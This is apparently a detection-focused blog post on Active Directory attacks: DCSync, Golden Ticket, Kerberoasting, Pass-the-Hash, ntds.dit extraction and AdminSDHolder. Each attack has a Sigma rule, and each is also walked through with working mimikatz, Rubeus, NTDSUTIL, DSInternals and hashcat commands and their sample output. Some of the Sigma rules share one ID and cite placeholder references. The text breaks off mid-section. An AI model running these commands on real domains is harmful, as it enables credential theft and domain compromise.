Detect AD attacks

هحدثه كل فترة إن شاء الله

DCSync attack

DCSync is a credential dumping technique used by threat actors to compromise domain users’ credentials.

This attack abuses the Directory Replication Service (DRS) remote protocol domain controllers used for synchronization and replication.

To successfully perform this attack, a threat actor must have access to a domain user account with “Replicating Directory Changes” and “Replicating Directory Changes All” privileges.

  • DCSync attacks are typically performed using tools like Mimikatz

The DCSync module sends a request to the domain controller, simulating the behavior of a legitimate domain controller replication request.

The domain controller, thinking it's replicating data to another domain controller, provides the requested sensitive account information.

Once the attacker receives the requested data, they can extract password hashes and other credential information from the response.

These password hashes can then be cracked offline using various techniques, potentially revealing plaintext passwords.

PS> .\mimikatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt"
 
[DC] 'domain.com' will be the domain
[DC] 'DC1.DOMAIN.com' will be the DC server
[DC] 'DOMAIN\krbtgt' will be the user account
 
Object RDN           : krbtgt
 
** SAM ACCOUNT **
 
SAM Username         : krbtgt
User Principal Name  : krbtgt@DOMAIN.COM
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 09/03/2021 14:51:03
Object Security ID   : S-1-5-21-5840559-2756745051-1363507867-502
Object Relative ID   : 502
 
Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
 
# ... output truncated ...
 
* Primary:Kerberos-Newer-Keys *
    Default Salt : DOMAIN.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
      aes128_hmac       (4096) : 471644de05c4834cc6cbc06896210e7d
      des_cbc_md5       (4096) : 23861a94ea83a4cd
 
# ... output truncated ...

  • The obtained KRBTGT account credential is a prerequisite to perform a Golden ticket attack.

  • It is possible to detect a DCSync attack by monitoring network traffic to every domain controller, or by analyzing Windows event logs.

  • Event ID 4662 in the subcategory Audit Directory Service Access audits basic information about users performing operations within Active Directory for events specified in an object’s system access-control list (SACL).

SIGMA

title: DC Sync detection
id: 611eab06-a145-4dfa-a295-3ccc5c20f59a
status: test
description: Detects DC sync security events
references:
    - https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r
    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662
    - https://attack.mitre.org/techniques/T1003/006/
author: Medhat
date: 2023/10/18
modified: 2023/10/21
tags:
    - attack.credential_access
    - attack.s0002
    - attack.t1003.006
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4662
        Properties|contains:
            - 'Replicating Directory Changes All'
            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
            - '9923a32a-3607-11d2-b9be-0000f87a36b2'
            - '89e95b76-444d-4c62-991a-0facbeda640c'
        AccessMask: '0x100'# Specific access mask used in DCSync attacks
    filter1:
        SubjectDomainName: 'Window Manager'
    filter2:
        SubjectUserName|startswith:
            - 'NT AUT'
            - 'MSOL_'
    filter3:
        SubjectUserName|endswith: '$'
    condition: selection and not 1 of filter*
falsepositives:
     - Legitimate replication and synchronization activities
level: high

engoy reading :

Golden ticket attack

Golden tickets are forged authentication tickets that abuse the Kerberos protocol that encrypts and signs messages using shared secrets.

Kerberos tickets are generated using the password hash of the KRBTGT user account. These tickets can be used to access systems and data because the tickets are trusted and valid for authentication.

  • The NTLM password hash of the KRBTGT account obtained in the DCSync attack is used to facilitate the Golden ticket attack.

  • Run mimikatz as administrator and run the following command to forge Kerberos tickets using the NTLM hash of the KRBTGT account obtained 

PS> mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /user:NonExistentUser /groups:513,2668 /ptt"

mimikatz(commandline) # kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /user:NonExistentUser /ticket:GoldenTicket.kirbi /ptt
User      : NonExistentUser
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-5840559-2756745051-1363507867
User Id   : 500
Groups Id : *513 2668
ServiceKey: ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 - aes256_hmac
Lifetime  : 19/07/2020 22:31:00 ; 17/07/2030 22:31:00 ; 17/07/2030 22:31:00
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'NonExistentUser @ domain.com' successfully submitted for current session

  • To mint the TGT, the adversary must specify the following information to mimikatz kerberos::golden:

  • /domain — The FQDN of the domain

  • /sid — The SID of the domain

  • /aes256 — The AES-256 password hash of the KRBTGT user (alternatively, /ntlm or /rc4 can be used for NTLM hashes, and /aes128 for AES-128)

  • /user — The username to be impersonated

  • /groups — The list of groups (by RID) to include in the ticket, with the first being the user’s primary group

  • /ptt — Indicates that the forged ticket should be injected into the current session instead of being written to a file

We can see from the output that the golden ticket was successfully submitted for the current session.

  • Run the following command to open a command prompt session authenticated with the forged Kerberos ticket.

mimikatz # misc::cmd

Detecting the use of a golden ticket requires analyzing Kerberos tickets such as:

  • Usernames that don’t exist in Active Directory

  • Modified group memberships (added or removed)

  • Username and RID mismatches

  • Ticket lifetimes that exceed the domain maximum (the default domain lifetime is 10 hours but the default assigned by mimikatz is 10 years)

  • Event ID 4769: Audit Kerberos Service Ticket Operations "generated every time the Key Distribution Center (KDC) receives a Kerberos Ticket Granting Service (TGS) ticket request."

SIGMA

title: Detect Golden Ticket Attack
id:  611eab06-a145-4dfa-a295-3ccc5c20f59a
description: Detects Golden Ticket attacks in Windows Security Event logs.
status: test
author: medhat
date: 2023-11-02
references:
  - https://www.example.com/golden_ticket_attack_info
tags:
  - attack.golden_ticket
  - attack.kerberos
  - attack.ticket_forgery
logsource:
  product: windows
  service: security
  definition: 'EventID = 4769'

detection:
  selection:
    EventID: 4769
    TicketOptions: '0x40810000' # Ticket options indicating a TGT request with forwardable, renewable, and forwarded tickets
    ServiceName: 'krbtgt' # Target service name for the TGT
  condition: selection

falsepositives:
  - Legitimate Kerberos ticket requests by authorized users.

level: high

  • EventID: 4769 (Kerberos ticket creation).

  • TicketOptions: '0x40810000' represents the specific ticket options indicating a TGT request with forwardable, renewable, and forwarded tickets. You might need to adjust this value based on your research.

  • ServiceName: 'krbtgt' specifies the target service name for the TGT. In a Golden Ticket attack, attackers often target the Key Distribution Center (krbtgt) account.

Kerberoasting attack

Kerberoasting is an attack technique that involves an attacker abusing the privilege given to authenticated users to request a Ticket Granting Service (TGS) ticket for any servicePrincipalName (SPN) from a domain controller.

The ticket may be encrypted with a Cipher suite like RC4, HMAC, or MD5 using the password hash of the service account associated with the SPN.

The threat actor extracts the password hash of the ticket and attempts to crack the password offline.

  • STEP 1 Enumerate servicePrincipalNames

In a Kerberoasting attack, an adversary may target as many service accounts as possible or conduct internal reconnaissance to find specific service accounts with privileges they desire. In either case, the attacker needs to enumerate the servicePrincipalNames (SPNs) for the service accounts being targeted.

Username        SPN
--------        ---
ServiceAccount1 http/webserver1
ServiceAccount2 cifs/appserver2

  • STEP 2 Request TGS tickets and extract the password hashes

PS> .\Rubeus.exe kerberoast /simple /outfile:hashes.txt
 
[*] Action: Kerberoasting
 
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
 
[*] Searching the current domain for Kerberoastable users
 
[*] Total kerberoastable users : 2
 
[*] Hash written to C:\Tools\hashes.txt
 
[*] Roasted hashes written to : C:\Tools\hashes.txt
 
PS> Get-Content .\hashes.txt
 
$krb5tgs$23$*ServiceAccount1$domain.com$http/webserver1*$45FAD4676AECDDE4C1397BFCED441F79$DEB234D8A44B2ACD16F31F3ED42B54226E2D72890870966AB5158FFC5B2EC2B4A5D956BDB157A725E6E3A4A800F626D17BB3B6FE62CDF2BAD53EA337A5E8CC6627B8CB6A32B18B914B48D95C6544C9F57C83BEF4726224507002367AA868C76854138E6A7419376343DD5131614C7B97EBC73087312EBA06FF4B067DD261AECADDDB3118C4BDDCC662AAC91C0BEBA082197D4A48E172DBE5F5A4B5DB94B1FF6EED0968243010241B7F1588E2924E631C36915E055E1A364727B79F171F2A5150E544334F5F8D1A7980645F04F4794F2EF5FECA23A9D7EEB5A38490E1A56BAB4C17A6F7B009121E405C41A22B11F4980760A3F1D2D80B52FCD3C1CF60B09C54C77BF7D08BFCF40D90498600958D56BA704EAA2101A17AA5A2A1CCA8A90752C68A1E427757A10603DC8EA62CC03196595BEC2667DA096ECDB8E5F0D11963FD52558E06F3489378B596E26F638DBB738AA214F7282B1970023D7995597651B5BB7FDCF414C53BDF791C569EB8E45B6BE36F49E87080177211ADC3D4F53F0D109A9718497E18E85FDD5C3AD376AFD95372674C318C9E690BC8A6C75DD888BCC8129F15EE7D1C625951C979B97E21538619ABA93D9DD5E32D7549A2ED3406E42F21BD9535759B92F48BC767FC1A327E0F3CAC7ACCE2AB577E2E4103F6F8DE737AB80E1A177F50B6405B05EFD5004006F99548725D785E95498DCBE85F1B6409FE2F43FE0AF185CF8E4AE3E8E581B26FC0C485380BE8811347492004BC9C733EDCA31E538796AC0F908F5487A83478D271A6ADEBF4B816207E745E84B9009F4ACC77872DF0F3D9CE327DB25AA3408823CC5F139E7D12C115BDB487E4D531CE7374E1C90ED9F732E4EA04FF0EB4B84F323A98B95951AE2AAA98735522BC51596F17B5050B4F74045195C6FDC748E1EA4BE35C4DE8253077CA1F659BECC45E87663965073A5EE8D86B042A37ACC16EF64014D7E0DC8CC505CA7F8727F00D0D046805B9F8D5BCC6FF5368B5D6758F4F1A33F26C3C3D91C2359256B19292E02536153062DC3E7FC153AD6607D695BCB0DF66A88653E495C17FD2EB091274947AB4F31C8B756FFC9F40EBF0B661E54C31ABC1E5BE66E6C37807CE17BB1AA4E2ED5D4DE70E90DF602542BFD0A1A4B149F060496F09F0E03E1814A3AAE19A23195859F82C778324FE491024FF63BBB919F958447936B1DACD294B122EE0E85C2374C1192555C0C1CD66D877AF1A77826BE42017B75A5441822E9DAAD7C02366DD5907DD1517A4AEFBAB8F8ECCD1AE1910AB17E40E1E87E288250EE468F0D0AC81C36ACC9AF3524DBEA9DDFB8C08DF0872F4C01574798F28E8017AC5799D9773BDE87A2D6682F9C76493BD738E177E68F20D4310B5AA09D4672BC6C5B0FFB60F5F2A178D7C0EF8477E9B4F9194C5AB350DFA9568C5448BDB85C09A1E623DD683FBFE817004A6C188DE29699A4F85DE3D6075E7022B6CE9E744E518AA4CCB56F876047E4E07A94F99BC8AF68BD9E0FD256EBAD615BB8B4DFB89CFC7E5D2E2D71F07D9F67DDCFE72AD7B24EFD29EF5FF90A21E970011C11CDBC5D754382D359B775CFAD7FAD5FFB35FFB38EB4A1DEF06B331EF549478E7A227C39E49ED82C737EC4A23A4073AD816C2243BD88A7F5983B3
# ... output truncated ... #

  • STEP 3 Crack the passwords offline

  • STEP 4 Use new privileges to further objectives

With the plaintext password, the adversary can authenticate to any resources the service account has access to, helping them to compromise data or escalate privileges.

Here’s how an attacker can use compromised credentials to authenticate directly to a database the service account uses, and then exploit configuration vulnerabilities to escalate their privileges to a database administrator.

PS> runas /netonly /User:ServiceAccount1 powershell.exe
Enter the password for ServiceAccount1: P@ssword!23
 
PS> Import-Module .\PowerUPSQL
PS> $SQLServers = Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded | Where-object { $_.Status -eq "Accessible" }
PS> $SQLServers | Get-SQLServerInfo | Select-Object Instance, IsSysadmin -Unique
 
Instance        IsSysadmin
--------        ----------
SQLServer1      No
 
PS> Invoke-SQLEscalatePriv -Instance SQLServer1 -Verbose
VERBOSE: SQLServer1 : Checking if you're already a sysadmin...
VERBOSE: SQLServer1 : You're not a sysadmin, attempting to change that...
# ... output truncated ... #
VERBOSE: SQLServer1 : Success! You are now a Sysadmin!
 
PS> $SQLServers | Get-SQLServerInfo | Select-Object Instance, IsSysadmin -Unique
 
Instance        IsSysadmin
--------        ----------
SQLServer1      Yes

  • Events 4769 and 4770 in subcategory Audit Kerberos Service Ticket Operations audit all TGS requests and renewals.

  • Adversaries casting a wide net or running Kerberoasting tools with default configuration options may trigger a large number of TGS requests than normally observed for a given user.

SIGMA

title: Detect Kerberoasting Attack
id:  611eab06-a145-4dfa-a295-3ccc5c20f59a
description: Detects Kerberoasting attacks in Windows Security Event logs.
status: test
author: medhat
date: 2023-11-01
references:
  - https://www.example.com/kerberoasting_attack_info

logsource:
  category: windows
  product: windows
  service: security
  definition: 'EventID = 4769'

detection:
  selection:
    EventID: 4769
    TicketOptions: '0x60810000' # Ticket options indicating a service ticket request (forwardable, renewable, and service ticket)
    ServiceName: '*.com' # Replace '*.com' with your domain name or specific SPN patterns to monitor
  condition: selection

falsepositives:
  - Legitimate service ticket requests by authorized users.

tags:
  - attack.kerberoasting
  - attack.kerberos
  - attack.service_ticket

level: high

Pass the hash attack

Pass the Hash is a technique used by threat actors to steal credentials and perform lateral movement.

This attack exploits the NTLM authentication protocol to authenticate a user with a password hash captured rather than using the account plaintext password.

STEP 1 Steal password hashes

An adversary who has gained a foothold in a network can use any of multiple methods to obtain password hashes, including DCSync attacks and extracting hashes from NTDS.dit.

Another method, is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer.

Note that this technique requires the adversary to have compromised administrative privileges to the computer (e.g., by enticing a user who is an administrator on the workstation to open a phishing email)

  • Open mimikatz as an administrator, then run the log passthehash.log and privilege::debug commands. The log passthehash.log enables logging of all the activities performed while the privilege::debug command grants the mimikatz process debug right by elevating privilege.

  • . Run sekurlsa::logonpasswords to extract password hashes from the LSASS.exe process memory, which stores the hashes for users with active sessions to the computer.

  • The goal of this command is to obtain a user account with the relevant privileges to achieve the objective of the attack. 

PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"
 
Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session           : RemoteInteractive from 2
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 09/07/2020 10:31:19
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
        msv :
         [00000003] Primary
         * Username : joed
         * Domain   : DOMAIN
         * NTLM     : eed224b4784bb040aab50b8856fe9f02
         * SHA1     : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
         * DPAPI    : e75e04767f812723a24f7e6d91840c1d
        tspkg :
        wdigest :
         * Username : joed
         * Domain   : DOMAIN
         * Password : (null)
        kerberos :
         * Username : joed
         * Domain   : domain.com
         * Password : (null)
        ssp :
        credman :

STEP 2 Authenticate using a stolen password hash

To pass-the-hash using mimikatz sekurlsa::pth,

  • /user: — The compromised user’s username

  • /domain: — The FQDN of the domain (if using a domain account) or “.” (if using a local account)

  • /ntlm:, /aes128: or /aes256: — The stolen NTLM, AES-128 or AES-256 password hash

PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"
 
user    : JoeD
domain  : domain.com
program : cmd.exe
impers. : no
NTLM    : eed224b4784bb040aab50b8856fe9f02
  |  PID  11560
  |  TID  10044
  |  LSA Process is now R/W
  |  LUID 0 ; 58143370 (00000000:0377328a)
  \_ msv1_0   - data copy @ 000001AE3DDE8A30 : OK !
  \_ kerberos - data copy @ 000001AE3DECE9E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001AE3DFEC428 (32) -> null

STEP 3 Access other resources

the adversary can use the PSExec tool to execute commands on remote systems in order expand their footprint and repeat the cycle of credential theft and lateral movement on an ever-growing number of systems.

PS> .\PSExec.exe \\server1 cmd.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [10.0.20348.1249]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>hostname
server1

pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.

  • Monitor NTLM authentications for example: a user accessing a larger number of endpoints than normal; or a user accessing endpoints for the first time.

  • in order to extract hashes from an endpoint's LSASS.exe process, the malware would need to obtain a handle with the PROCESS_VM_OPERATION and PROCESS_VM_WRITE privileges. EDR solutions can monitor for processes creating suspicious handles.

  • Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit

SIGMA

title: Detect Pass-the-Hash Attack
id: 611eab06-a145-4dfa-a295-3ccc5c20f59a
description: Detects Pass-the-Hash attacks in Windows Security Event logs.
status: test
author: MEDHAT
date: 2023-11-01
references:
  - https://www.example.com/pass_the_hash_attack_info

logsource:
  product: windows
  service: security
  definition: 'EventID = 4624'

detection:
  selection:
    EventID: 4624
    LogonType: 3 # Logon type 3 indicates network logon
    LogonProcessName: 'NtLmSsp' # Logon process used for NTLM authentication
    AuthenticationPackageName: 'NTLM' # Authentication package name for NTLM
  condition: selection

falsepositives:
  - Legitimate network logon events using NTLM authentication.

tags:
  - attack.pass_the_hash
  - attack.authentication
  - attack.ntlm

level: high

Ntds.dit password extraction

The ntds.dit file located in C:\Windows\NTDS\ is the database that stores all the data in the Active Directory on every domain controller.

Attackers can compromise users’ credentials by extracting the password hash from the ntds.dit file.

This attack can be achieved by using several techniques to copy the ntds.dit file from the DC to a local system to crack the password offline.

STEP 1 Obtain required privileges

  • An attacker needs access to the domain controller file system to extract ntds.dit file

  • In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.

PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User      : FakeUser1
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-441320023-234525631-506766575
User Id   : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service   : HOST
Target    : DC1.domain.com
Lifetime  : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
 
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
 
# A new command prompt window opens
C:\Windows\System32>

STEP 2 Exfiltrate ntds.dit

  • With access to a domain controller’s file system, the adversary can exfiltrate ntds.dit as well as the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit.

  • while Active Directory is running, it maintains a file system lock on the ntds.dit file, so attempts to copy it will fail. Adversaries

Adversaries have multiple ways ,they can:

  • Simply stop Active Directory (though this is likely to result in being detected).

  • Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot.

  • Use a PowerShell tool like PowerSploit’s Invoke-NinjaCopy to copy the files even though they are in use.

  • Use a built-in tool like DSDBUtil.exe or NTDSUtil.exe to create active directory installation media files.

PS> .\PSExec.exe \\dc1.domain.com cmd
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
     Target Database: S:\Files\Active Directory\ntds.dit
 
                  Defragmentation  Status (Complete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
 
DC1 > Copy S:\Files \\wks2\Share

STEP 3 Extract the password hashes

  • Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network.

  • An adversary interested in cracking the passwords will often want to run a brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit

  • The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.

$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM

Run the following command to extract password hashes from the ntds.dit file.

Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
  Format-Custom -View HashcatNT | 
  Out-File C:\Hashdump.txt
 
 
PS> Get-Content C:\Hashdump.txt
 
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #

STEP 4 Use the password hashes to gain further objectives

  • The adversary can now use the password hashes in pass-the-hash attacks within the environment

  • they will seek to crack these passwords for use in credential stuffing attacks against non-domain joined systems.

PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
 
PS> Get-Content .\cracked.txt
 
852e811a65d732c83214b4ff705d777a:F8qN47F1
 
PS>   # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS>   $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS>   $Password = "F8qN47F1" # This is the password copied from cracked.txt
PS>   $Object = New-Object -TypeName psobject
PS>   $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS>   $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS>   $url = "https://service.url/api/login"
PS>   $body = $Object | ConvertTo-Json
PS>   $Header = @{ "accept" = "text/json"}
PS>   $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
 
PS>   $Headers = @{ 'Authorization' = "Bearer $Response" }
PS>   $url = "https://service.url/api/DoThings"
PS>   $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS>   $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }

  • Attempts to access ntds.dit can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.

SIGMA 

title: Detect Ntds.dit Password Extraction Attempt
id: 
description: Detects suspicious activities related to Ntds.dit file extraction.
status: test
author: Medhat
date: 2023-11-03
references:
  - https://www.example.com/ntds_dit_extraction_info

logsource:
  category: windows
  product: windows
  service: security
  definition: 'EventID IN (4663, 4662, 4670, 5145, 4660)'

detection:
  selection:
    - EventID: 4663
      ObjectType: file
      ObjectName: '*\ntds.dit'
      AccessMask: '0x2' # Check for Read (FILE_GENERIC_READ) access
    - EventID: 4662
      ObjectType: SAM_SERVER
      ObjectName: '*\SAM'
      AccessMask: '0x1f02a001' # Specific access mask used for DCSync attack
    - EventID: 4670
      ObjectType: secret
      ObjectName: '*\Ntds'
    - EventID: 5145
      ObjectType: file
      ObjectName: '*\ntds.dit'
      AccessMask: '0x2' # Check for Write (FILE_ADD_FILE) access
    - EventID: 4660
      ObjectType: file
      ObjectName: '*\ntds.dit'
      AccessMask: '0x2' # Check for Delete (FILE_DELETE_CHILD) access
  condition: selection

falsepositives:
  - Legitimate administrative activities related to the Ntds.dit file.

tags:
  - attack.password_extraction
  - attack.ntds.dit
  - attack.active_directory

level: high

  • For Event ID 4663, it checks for read access to the Ntds.dit file (ObjectPath: '*\ntds.dit' and AccessMask: '0x2').

  • For Event ID 4662, it checks for specific access to the SAM database, which can be an indication of DCSync attack.

  • Event ID 4670 is checked for access to the Ntds secrets.

  • Event ID 5145 is checked for write access to the Ntds.dit file.

  • Event ID 4660 is checked for delete access to the Ntds.dit file.

enjoy with that

AdminSDHolder Attack

AdminSDHolder modification is a persistence technique in which an attacker abuses the SDProp process in Active Directory to establish a persistent backdoor to Active Directory.

Each hour (by default), SDProp compares the permissions on protected objects (e.g., Users with Domain Admin Privileges) in Active Directory with those defined on a special container called AdminSDHolder.

If they differ, it replaces the permissions on the protected object with those defined on AdminSDHolder. Therefore, an adversary who modifies the AdminSDHolder container can establish a path of shadow administration and a means to regain administrative access to Active Directory.

  • By modifying the permissions of a protected group or user account, an attacker can grant themselves unauthorized administrative privileges.

STEP 1 Acquire the required privileges

Before an adversary can modify the AdminSDHolder container, they must gain administrative privilege in the domain

the adversary utilizes the Rubeus tool to AS-REP roast a privileged user (JoeD) with Kerberos pre-authentication disabled.

PS> .\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat
 
[*] Action: AS-REP roasting
 
[*] Target Domain          : domain.com
[*] Target DC              : dc1
 
[*] Searching path 'LDAP://dc1/DC=domain,DC=com' for AS-REP roastable users
[*] SamAccountName         : joed
[*] DistinguishedName      : CN=Joe Dibley,OU=Users,OU=Admin,DC=domain,DC=com
[*] Using domain controller: dc1 (10.154.201.1)
[*] Building AS-REQ (w/o preauth) for: 'domain.com\joed'
[+] AS-REQ w/o preauth successful!
[*] Hash written to c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt
 
[*] Roasted hashes written to : c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt
 
PS> .\hashcat.exe -m 18200 -o cracked.txt -a 0 .\Hash.txt .\wordlist.txt
...
 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$joed@domain.com:e7d1f...2ac95c
Time.Started.....: Thu Jul 23 18:58:36 2020 (0 secs)
Time.Estimated...: Thu Jul 23 18:58:36 2020 (0 secs)
Guess.Base.......: File (.\wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    97694 H/s (0.26ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 100/100 (100.00%)
Rejected.........: 0/100 (0.00%)
Restore.Point....: 0/100 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> taylor
Hardware.Mon.#1..: Temp: 47c Fan: 34% Util: 32% Core:1265MHz Mem:2504MHz Bus:16
 
PS> Get-Content .\cracked.txt
$krb5asrep$23$joed@domain.com:e7d1f86a67ca41137f9a0b45d24f5795$3f8e0e7a0d8055d91a3fa2c67b537949e7dc30f41b797e01fa459d774d0c10c3fbc2488c7bb634db93118bb5a8dfe99107899f56e2542d39fef9b27d893fbaa5e92acd207b059b548d456f9daa18b24f0c9e83af16898eec8e9dbde3128772924a3f10e09cd66fbede311b3c3a4aa45d9feb6c49178dbab65dd8e38af89b3ac0fad7bde16b0bb50e25c8f6f92d29d5d3a9dc8e633e31db73dd06aa2e2a5e97053f73fada97564248d048fc74b7e13d56016210e6a3d1f4e4c7cafb60007bec16d682b3fd210bdaa1d2f3d44c717f19cf1583e814d92ace43991d132be1897ebeaa8b78daa7b29f1a3e03301c3920da1cf9bd8a887a92fc79280734e5acb2fadcfa05895f0f2ac95c:P@ssword!23
 
# domain\joed has a password of: P@ssword!23

STEP 2 Modify the AdminSDHolders access control list (ACL)

After successfully cracking password hash for the JoeD account obtained through AS-REP roasting,

The attacker authenticates with the password and uses PowerSploit’s Add-DomainObjectACL cmdlet to grant all privileges on the AdminSDHolder container to a normal user they’d previously compromised (BobT).

The next time the SDProp process runs, BobT’s new privileges will be applied to all protected objects.

PS> runas /noprofile /user:domain\joed powershell.exe
 
